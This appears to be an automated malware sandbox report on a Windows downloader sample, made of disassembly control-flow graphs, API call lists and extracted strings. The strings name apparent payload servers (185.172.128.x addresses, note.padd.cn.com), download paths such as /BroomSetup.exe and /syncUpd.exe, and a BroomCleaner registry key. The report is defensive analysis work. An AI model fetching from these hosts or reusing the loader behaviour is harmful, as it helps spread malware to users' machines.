                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 620 424a0e-424b14 call 40a0c0 call 403491 call 40197c call 401b1e call 401a8d call 401a72 call 401a8d call 403498 call 401b52 call 401b1e call 4265bc call 401b1e GetModuleFileNameA call 401b1e call 42604a call 401a0c 651 424da5-424da7 620->651 652 424b1a 620->652 653 4252b7-42588c call 403491 * 15 call 40197c call 403491 * 19 call 40197c call 401b1e call 401a67 call 40356f call 401ae8 call 401b41 * 2 call 401adf call 401a67 call 401adf call 42676c call 40ff7e call 403491 * 14 call 40197c call 403491 * 15 call 40197c call 403491 * 12 call 40197c call 403491 * 13 call 40197c call 401b41 * 2 call 401adf * 2 call 42676c 651->653 654 424dad-425299 call 403491 * 35 call 40197c call 401b1e call 401a67 * 2 call 4034e3 call 401ae8 call 403491 * 14 call 40197c call 401b41 * 2 call 401adf call 401a67 call 401adf call 42676c call 40ff7e call 403491 * 21 call 40197c call 403491 * 9 call 40197c call 403491 call 40197c call 42615a 651->654 655 424b21-424b51 call 403491 * 3 652->655 656 424b56-424b86 call 403491 * 3 652->656 657 424d26-424d62 call 403491 * 4 652->657 658 424d64-424d8d call 403491 * 3 652->658 659 424c5a-424c8a call 403491 * 3 652->659 660 424b8b-424bd3 call 403491 * 5 652->660 661 424bd8-424c14 call 403491 * 4 652->661 662 424c19-424c55 call 403491 * 4 652->662 663 424c8f-424cd7 call 403491 * 5 652->663 664 424cdc-424d24 call 403491 * 5 652->664 1166 425892-425910 call 40b740 call 403491 * 4 call 40197c call 426582 call 426242 653->1166 1167 425fc0-42601f call 4019f8 * 2 call 401ae8 call 401a11 call 401ae8 * 4 653->1167 1138 42529e-4252b2 call 4019f8 call 401ae8 654->1138 740 424d94-424da0 call 40197c call 401adf 655->740 656->740 657->740 658->740 659->740 660->740 661->740 662->740 663->740 664->740 740->651 1138->653 1200 425912-425924 call 401b1e call 426510 1166->1200 1201 42592c-425b37 call 40ff7e call 403491 * 16 call 40197c call 403491 * 14 call 40197c call 401b41 * 2 call 401adf * 2 call 42676c 1166->1201 1208 425929 1200->1208 1282 425d0d-425d12 1201->1282 1283 425b3d-425c53 call 40b740 call 403491 * 4 call 40197c call 426582 call 40b740 call 426582 call 403491 * 8 call 40197c call 40b740 1201->1283 1208->1201 1285 425fb4-425fbb call 4019f8 1282->1285 1286 425d18-425f01 call 403491 * 15 call 40197c call 403491 * 15 call 40197c call 401b41 * 2 call 401adf * 2 call 42676c 1282->1286 1363 425c55-425c5a 1283->1363 1285->1167 1420 425f07-425f82 call 40b740 call 403491 * 4 call 40197c call 426582 call 426242 1286->1420 1421 425fab-425faf call 4019f8 1286->1421 1363->1363 1365 425c5c-425c65 1363->1365 1367 425c66-425c6c 1365->1367 1367->1367 1369 425c6e-425c7c 1367->1369 1371 425c7e-425c83 1369->1371 1371->1371 1373 425c85-425c8e 1371->1373 1375 425c8f-425c95 1373->1375 1375->1375 1376 425c97-425cbe call 426242 1375->1376 1382 425d00-425d07 call 40ff7e 1376->1382 1383 425cc0-425ce4 CreateDirectoryA call 42628b 1376->1383 1390 425d0c 1382->1390 1383->1382 1392 425ce6-425cf8 call 401b1e call 426510 1383->1392 1390->1282 1400 425cfd 1392->1400 1400->1382 1439 425f84-425f96 call 401b1e call 426510 1420->1439 1440 425f9e-425fa5 call 40ff7e 1420->1440 1421->1285 1446 425f9b 1439->1446 1443 425faa 1440->1443 1443->1421 1446->1440
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 004265BC: __EH_prolog.LIBCMT ref: 004265C1
                                                                                                                                                                                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104,0043BEDC), ref: 00424AD4
                                                                                                                                                                                                                                        • Part of subcall function 0042604A: __EH_prolog.LIBCMT ref: 0042604F
                                                                                                                                                                                                                                        • Part of subcall function 0042604A: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00426131
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: H_prolog$FileIos_base_dtorModuleNamestd::ios_base::_
                                                                                                                                                                                                                                      • String ID: .exe$.exe$.zip$/1/Package.zip$/BroomSetup.exe$/cpa/ping.php?substr=%s&s=ab&sub=%s$/ping.php?substr=%s$/syncUpd.exe$/timeSync.exe$185.172.128.203$185.172.128.228$185.172.128.228$185.172.128.59$185.172.128.90$Installed$P$P$P$P$P$SOFTWARE\BroomCleaner$\run.exe$note.padd.cn.com$sub=([\w-]{1,255})$two
                                                                                                                                                                                                                                      • API String ID: 2531350358-3033353151
                                                                                                                                                                                                                                      • Opcode ID: 9052fb54abde8957b0c8dcd2af763798e33b4e0189765b8ce0abbbbf1defcb6f
                                                                                                                                                                                                                                      • Instruction ID: d125a89a0ba1aec4cd60c53361ca74c042bcd3054cac0714d62587379a507679
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9052fb54abde8957b0c8dcd2af763798e33b4e0189765b8ce0abbbbf1defcb6f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EFB2131050A2E19AC712FB7958567CA2FE49B62309F54687FE7D01F2A3CB78460C87DE
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 1707 42628b-4262cf call 427830 CoInitialize CoCreateInstance 1710 4262d1-4262d6 1707->1710 1711 4262ef-4262f1 1707->1711 1712 4262d7-4262ee call 40ddc6 1710->1712 1713 4262f4-4262f9 1711->1713 1713->1713 1715 4262fb-426321 MultiByteToWideChar SysAllocStringLen 1713->1715 1717 426324-426329 1715->1717 1717->1717 1718 42632b-42633c MultiByteToWideChar 1717->1718 1719 42633f-426344 1718->1719 1719->1719 1720 426346-426365 MultiByteToWideChar SysAllocStringLen 1719->1720 1721 426368-42636d 1720->1721 1721->1721 1722 42636f-4263a6 MultiByteToWideChar 1721->1722 1724 4263a8-4263b7 1722->1724 1725 4263bc-4263e8 1722->1725 1724->1712 1728 4263f0-4263fd 1725->1728 1729 4263ea-4263ee 1725->1729 1732 42640f-426422 1728->1732 1733 4263ff-42640d 1728->1733 1729->1724 1736 426457-4264d2 1732->1736 1737 426424-426450 call 40ddc6 1732->1737 1733->1729 1749 4264d6-4264f2 call 40ddc6 1736->1749 1737->1736
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CoInitialize.OLE32(00000000), ref: 004262AD
                                                                                                                                                                                                                                      • CoCreateInstance.OLE32(00429220,00000000,00000001,00429210,?,?,?,?,?,?,?,?,?,?,?,/ping.php?substr=%s), ref: 004262C7
                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 00426309
                                                                                                                                                                                                                                      • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00426311
                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?,?,?,00000000,00000000), ref: 00426338
                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,00000000,?,?,?,00000000,00000000), ref: 0042634E
                                                                                                                                                                                                                                      • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00426355
                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,00000000,00000000,?,?,00000000,?), ref: 0042637A
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ByteCharMultiWide$AllocString$CreateInitializeInstance
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3070066007-0
                                                                                                                                                                                                                                      • Opcode ID: ce133915acab1118794e9b5cd677c6d3f7326e3d37cb49b767c5506a71b1f5aa
                                                                                                                                                                                                                                      • Instruction ID: 83f5cca910cad30c2957a1169f386ac85e7f4b82ddc6b65933772462ec616701
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ce133915acab1118794e9b5cd677c6d3f7326e3d37cb49b767c5506a71b1f5aa
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3A914B75A00218AFDB04DFA8D888AEEBBB9FF49314F544559F805EB241D776AC02CB64
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 1846 4139e7-4139f3 call 4177fa 1849 413a15-413a21 call 413a6c ExitProcess 1846->1849 1850 4139f5-413a03 GetPEB 1846->1850 1850->1849 1851 413a05-413a0f GetCurrentProcess TerminateProcess 1850->1851 1851->1849
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000003,?,004139BD,00000003,00438DB0,0000000C,00413B14,00000003,00000002,00000000,?,00412B6B,00000003), ref: 00413A08
                                                                                                                                                                                                                                      • TerminateProcess.KERNEL32(00000000,?,004139BD,00000003,00438DB0,0000000C,00413B14,00000003,00000002,00000000,?,00412B6B,00000003), ref: 00413A0F
                                                                                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 00413A21
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1703294689-0
                                                                                                                                                                                                                                      • Opcode ID: 89ebcf6bc015773511dc3aad9cd82e24c556da80457bd1d22a03e0f024b4907b
                                                                                                                                                                                                                                      • Instruction ID: 8e17948dea93fcc861bafccf52e4138581932e64e8d8508709b4de54f2ab24c4
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 89ebcf6bc015773511dc3aad9cd82e24c556da80457bd1d22a03e0f024b4907b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 83E0B631100108ABCF21AF65DD09A993B69EF54786F444029F9869A232DB39EE92CA48
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 041E5BFE
                                                                                                                                                                                                                                      • Module32First.KERNEL32(00000000,00000224), ref: 041E5C1E
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2368576914.00000000041E5000.00000040.00000020.00020000.00000000.sdmp, Offset: 041E5000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_41e5000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3833638111-0
                                                                                                                                                                                                                                      • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                                      • Instruction ID: 8b7b800f224c7716825e143119289c101a3e71810b9bc1425cc6cf348cba0cd3
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3BF0C239100B10BBE7203AF79CCCA7E76FEAF48628F140568E646924C0DB70F8864660
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 1447 41a242-41a272 call 419fa5 1450 41a274-41a27f call 41236e 1447->1450 1451 41a28d-41a299 call 41e6a7 1447->1451 1456 41a281-41a288 call 412381 1450->1456 1457 41a2b2-41a2fb call 419f10 1451->1457 1458 41a29b-41a2b0 call 41236e call 412381 1451->1458 1465 41a564-41a56a 1456->1465 1467 41a368-41a371 GetFileType 1457->1467 1468 41a2fd-41a306 1457->1468 1458->1456 1469 41a373-41a3a4 GetLastError call 41234b CloseHandle 1467->1469 1470 41a3ba-41a3bd 1467->1470 1472 41a308-41a30c 1468->1472 1473 41a33d-41a363 GetLastError call 41234b 1468->1473 1469->1456 1486 41a3aa-41a3b5 call 412381 1469->1486 1477 41a3c6-41a3cc 1470->1477 1478 41a3bf-41a3c4 1470->1478 1472->1473 1474 41a30e-41a33b call 419f10 1472->1474 1473->1456 1474->1467 1474->1473 1479 41a3d0-41a41e call 41e5f0 1477->1479 1480 41a3ce 1477->1480 1478->1479 1489 41a420-41a42c call 41a121 1479->1489 1490 41a42e-41a452 call 419cc3 1479->1490 1480->1479 1486->1456 1489->1490 1496 41a456-41a460 call 4163fd 1489->1496 1497 41a465-41a4a8 1490->1497 1498 41a454 1490->1498 1496->1465 1500 41a4c9-41a4d7 1497->1500 1501 41a4aa-41a4ae 1497->1501 1498->1496 1503 41a562 1500->1503 1504 41a4dd-41a4e1 1500->1504 1501->1500 1502 41a4b0-41a4c4 1501->1502 1502->1500 1503->1465 1504->1503 1506 41a4e3-41a516 CloseHandle call 419f10 1504->1506 1509 41a518-41a544 GetLastError call 41234b call 41e7b9 1506->1509 1510 41a54a-41a55e 1506->1510 1509->1510 1510->1503
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00419F10: CreateFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 00419F2D
                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 0041A356
                                                                                                                                                                                                                                      • __dosmaperr.LIBCMT ref: 0041A35D
                                                                                                                                                                                                                                      • GetFileType.KERNEL32(00000000), ref: 0041A369
                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 0041A373
                                                                                                                                                                                                                                      • __dosmaperr.LIBCMT ref: 0041A37C
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0041A39C
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 0041A4E6
                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 0041A518
                                                                                                                                                                                                                                      • __dosmaperr.LIBCMT ref: 0041A51F
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                                                                                                                                      • String ID: H
                                                                                                                                                                                                                                      • API String ID: 4237864984-2852464175
                                                                                                                                                                                                                                      • Opcode ID: 693600e6575519d5232ec394ac030b5dd81d70dd39d7e28a8c319a74ab69f910
                                                                                                                                                                                                                                      • Instruction ID: 6253cfc56dbab61e205766efb0611ca8061eb8c5ebbdbf8fd01913e42387971c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 693600e6575519d5232ec394ac030b5dd81d70dd39d7e28a8c319a74ab69f910
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A4A13632A041089FDF199F78D8517EE7BA1AB06324F14019EEC15EB391D7398DA2C79A
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 1515 4192ad-4192bd 1516 4192d7-4192d9 1515->1516 1517 4192bf-4192d2 call 41236e call 412381 1515->1517 1519 419641-41964e call 41236e call 412381 1516->1519 1520 4192df-4192e5 1516->1520 1533 419659 1517->1533 1538 419654 call 410905 1519->1538 1520->1519 1523 4192eb-419316 1520->1523 1523->1519 1526 41931c-419325 1523->1526 1529 419327-41933a call 41236e call 412381 1526->1529 1530 41933f-419341 1526->1530 1529->1538 1531 419347-41934b 1530->1531 1532 41963d-41963f 1530->1532 1531->1532 1536 419351-419355 1531->1536 1537 41965c-419661 1532->1537 1533->1537 1536->1529 1540 419357-41936e 1536->1540 1538->1533 1543 419370-419373 1540->1543 1544 41938b-419394 1540->1544 1546 419375-41937b 1543->1546 1547 41937d-419386 1543->1547 1548 4193b2-4193bc 1544->1548 1549 419396-4193ad call 41236e call 412381 call 410905 1544->1549 1546->1547 1546->1549 1550 419427-419441 1547->1550 1552 4193c3-4193e1 call 417a45 call 41629a * 2 1548->1552 1553 4193be-4193c0 1548->1553 1581 419574 1549->1581 1554 419515-41951e call 4210f9 1550->1554 1555 419447-419457 1550->1555 1584 4193e3-4193f9 call 412381 call 41236e 1552->1584 1585 4193fe-419424 call 419800 1552->1585 1553->1552 1568 419591 1554->1568 1569 419520-419532 1554->1569 1555->1554 1558 41945d-41945f 1555->1558 1558->1554 1562 419465-41948b 1558->1562 1562->1554 1566 419491-4194a4 1562->1566 1566->1554 1571 4194a6-4194a8 1566->1571 1573 419595-4195ad ReadFile 1568->1573 1569->1568 1574 419534-419543 GetConsoleMode 1569->1574 1571->1554 1576 4194aa-4194d5 1571->1576 1578 419609-419614 GetLastError 1573->1578 1579 4195af-4195b5 1573->1579 1574->1568 1580 419545-419549 1574->1580 1576->1554 1583 4194d7-4194ea 1576->1583 1586 419616-419628 call 412381 call 41236e 1578->1586 1587 41962d-419630 1578->1587 1579->1578 1588 4195b7 1579->1588 1580->1573 1589 41954b-419565 ReadConsoleW 1580->1589 1582 419577-419581 call 41629a 1581->1582 1582->1537 1583->1554 1595 4194ec-4194ee 1583->1595 1584->1581 1585->1550 1586->1581 1592 419636-419638 1587->1592 1593 41956d-419573 call 41234b 1587->1593 1599 4195ba-4195cc 1588->1599 1590 419567 GetLastError 1589->1590 1591 419586-41958f 1589->1591 1590->1593 1591->1599 1592->1582 1593->1581 1595->1554 1602 4194f0-419510 1595->1602 1599->1582 1606 4195ce-4195d2 1599->1606 1602->1554 1610 4195d4-4195e4 call 418fc9 1606->1610 1611 4195eb-4195f6 1606->1611 1620 4195e7-4195e9 1610->1620 1613 419602-419607 call 418e09 1611->1613 1614 4195f8 call 419119 1611->1614 1621 4195fd-419600 1613->1621 1614->1621 1620->1582 1621->1620
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 7455f818b0db2fde8e31381446929043f5d461325fffdbb46aed0dcd817dfcea
                                                                                                                                                                                                                                      • Instruction ID: c4abe014ee414803f6a4a6dca87339887fd42b2314c6943b79fa01ee0dc397dc
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7455f818b0db2fde8e31381446929043f5d461325fffdbb46aed0dcd817dfcea
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1CC13AB1E04249AFDB11CFA9C850BEE7BB1BF09314F04019AE954A7392C7389DC1CB69
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 1623 414003c-4140047 1624 414004c-4140263 call 4140a3f call 4140e0f call 4140d90 VirtualAlloc 1623->1624 1625 4140049 1623->1625 1640 4140265-4140289 call 4140a69 1624->1640 1641 414028b-4140292 1624->1641 1625->1624 1645 41402ce-41403c2 VirtualProtect call 4140cce call 4140ce7 1640->1645 1642 41402a1-41402b0 1641->1642 1644 41402b2-41402cc 1642->1644 1642->1645 1644->1642 1652 41403d1-41403e0 1645->1652 1653 41403e2-4140437 call 4140ce7 1652->1653 1654 4140439-41404b8 VirtualFree 1652->1654 1653->1652 1656 41405f4-41405fe 1654->1656 1657 41404be-41404cd 1654->1657 1659 4140604-414060d 1656->1659 1660 414077f-4140789 1656->1660 1658 41404d3-41404dd 1657->1658 1658->1656 1664 41404e3-4140505 LoadLibraryA 1658->1664 1659->1660 1665 4140613-4140637 1659->1665 1662 41407a6-41407b0 1660->1662 1663 414078b-41407a3 1660->1663 1667 41407b6-41407cb 1662->1667 1668 414086e-41408be LoadLibraryA 1662->1668 1663->1662 1669 4140517-4140520 1664->1669 1670 4140507-4140515 1664->1670 1671 414063e-4140648 1665->1671 1672 41407d2-41407d5 1667->1672 1675 41408c7-41408f9 1668->1675 1673 4140526-4140547 1669->1673 1670->1673 1671->1660 1674 414064e-414065a 1671->1674 1676 4140824-4140833 1672->1676 1677 41407d7-41407e0 1672->1677 1678 414054d-4140550 1673->1678 1674->1660 1679 4140660-414066a 1674->1679 1680 4140902-414091d 1675->1680 1681 41408fb-4140901 1675->1681 1687 4140839-414083c 1676->1687 1682 41407e4-4140822 1677->1682 1683 41407e2 1677->1683 1684 4140556-414056b 1678->1684 1685 41405e0-41405ef 1678->1685 1686 414067a-4140689 1679->1686 1681->1680 1682->1672 1683->1676 1688 414056d 1684->1688 1689 414056f-414057a 1684->1689 1685->1658 1690 4140750-414077a 1686->1690 1691 414068f-41406b2 1686->1691 1687->1668 1692 414083e-4140847 1687->1692 1688->1685 1694 414057c-4140599 1689->1694 1695 414059b-41405bb 1689->1695 1690->1671 1696 41406b4-41406ed 1691->1696 1697 41406ef-41406fc 1691->1697 1698 4140849 1692->1698 1699 414084b-414086c 1692->1699 1706 41405bd-41405db 1694->1706 1695->1706 1696->1697 1700 41406fe-4140748 1697->1700 1701 414074b 1697->1701 1698->1668 1699->1687 1700->1701 1701->1686 1706->1678
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 0414024D
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2367868984.0000000004140000.00000040.00001000.00020000.00000000.sdmp, Offset: 04140000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_4140000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AllocVirtual
                                                                                                                                                                                                                                      • String ID: cess$kernel32.dll
                                                                                                                                                                                                                                      • API String ID: 4275171209-1230238691
                                                                                                                                                                                                                                      • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                                                                                      • Instruction ID: b47c96db895f4007dc23359b62bde7bf6677b9304391058e9481df81abb14c62
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B7527974A00229DFDB64CF69C984BACBBB1BF49314F1480D9E94DAB351DB30AA85DF14
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 1753 42615a-426191 call 42780c RegCreateKeyExA 1756 426222-426226 1753->1756 1757 426197-4261aa 1753->1757 1759 426231-426241 1756->1759 1760 426228-42622b RegCloseKey 1756->1760 1758 4261ad-4261b2 1757->1758 1758->1758 1761 4261b4-4261d3 call 402c71 1758->1761 1760->1759 1764 4261d6-4261db 1761->1764 1764->1764 1765 4261dd-426215 call 402c71 RegSetValueExA call 402bef 1764->1765 1769 42621a-42621d call 402bef 1765->1769 1769->1756
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • __EH_prolog.LIBCMT ref: 0042615F
                                                                                                                                                                                                                                      • RegCreateKeyExA.KERNEL32(80000001,SOFTWARE\BroomCleaner,00000000,00000000,00000000,000F003F,00000000,?,00000000,Installed,0043BED8,SOFTWARE\BroomCleaner), ref: 00426187
                                                                                                                                                                                                                                      • RegSetValueExA.KERNEL32(?,?,00000000,00000001,?,?,0043BED8,0043BED9,Installed,Installed), ref: 0042620A
                                                                                                                                                                                                                                      • RegCloseKey.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,185.172.128.90,/cpa/ping.php?substr=%s&s=ab&sub=%s,?), ref: 0042622B
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CloseCreateH_prologValue
                                                                                                                                                                                                                                      • String ID: Installed$SOFTWARE\BroomCleaner
                                                                                                                                                                                                                                      • API String ID: 1996196666-529226407
                                                                                                                                                                                                                                      • Opcode ID: 9742427db463fe4f6bb28d71d590d7309dc6e65af80fb6a01f8e3694ad2225c2
                                                                                                                                                                                                                                      • Instruction ID: 7631ba6f6479b49e2955b4a66f7b67ea7b8ea0f8d2650bf46820f955d15f7583
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9742427db463fe4f6bb28d71d590d7309dc6e65af80fb6a01f8e3694ad2225c2
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F3319A71A00129EEDF149FA8DC94AFEBB78EB08348F44016EE80277281C7B11D05CB64
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 1771 404189-4041c6 call 42780c call 407b1c call 401318 call 4013b5 1780 404201-404218 call 407b74 1771->1780 1781 4041c8-4041ca 1771->1781 1783 4041d0-4041e1 call 40436e 1781->1783 1784 4041cc-4041ce 1781->1784 1788 4041e3-4041fb call 407d41 1783->1788 1789 404219-404230 call 401198 call 40abcb 1783->1789 1784->1780 1788->1780
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • __EH_prolog.LIBCMT ref: 0040418E
                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 0040419D
                                                                                                                                                                                                                                      • int.LIBCPMT ref: 004041B4
                                                                                                                                                                                                                                        • Part of subcall function 00401318: std::_Lockit::_Lockit.LIBCPMT ref: 00401329
                                                                                                                                                                                                                                        • Part of subcall function 00401318: std::_Lockit::~_Lockit.LIBCPMT ref: 00401343
                                                                                                                                                                                                                                      • std::locale::_Getfacet.LIBCPMT ref: 004041BD
                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 004041EE
                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00404204
                                                                                                                                                                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0040422A
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologRegisterThrowstd::locale::_
                                                                                                                                                                                                                                      • String ID:
